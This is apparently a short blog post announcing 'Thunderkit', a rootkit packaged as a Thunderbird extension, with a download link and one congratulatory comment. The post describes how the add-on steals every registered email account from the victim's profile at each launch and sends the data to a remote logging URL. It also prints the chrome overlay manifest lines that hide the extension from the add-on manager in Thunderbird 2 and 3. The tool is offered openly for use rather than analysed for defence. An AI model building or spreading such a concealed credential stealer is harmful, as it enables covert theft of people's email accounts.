Well, today i brought to you the thunderkit the very first thunderbird rootkit, this is really nothing new, except the extension hide method which is compatible the more recent thunderbird and firefox versions.
Thunderkit is a very simple rootkit that have the capacity to hide himself from the thunderbird and retrieve all registered accounts from the current profile every time the victim starts thunderbird and sends them to a target log script, based on a url.
The rootkit can hide himself by setting a overlay on “about:addons”, the addon manager of the thunderbird, which is the same in firefox, and has the support of the previous versions.
# Thunderbird 2
overlay chrome://mozapps/content/extensions/extensions.xul chrome://thunderkit/content/hidden.xul
overlay chrome://mozapps/content/extensions/extensions.xul?type=extensions chrome://thunderkit/content/hidden.xul
# Thunderbird 3
overlay about:addons chrome://thunderkit/content/hidden.xul
Thunderkit was tested with the latest version of Thunderbird (7.0), but i think that works in other previous versions too, at least all versions with the XHR support.
Download Addon (unpack to view the source (xpi = zip))
Enjoy!
1 comment:
Congratz,
g4rr4
Post a Comment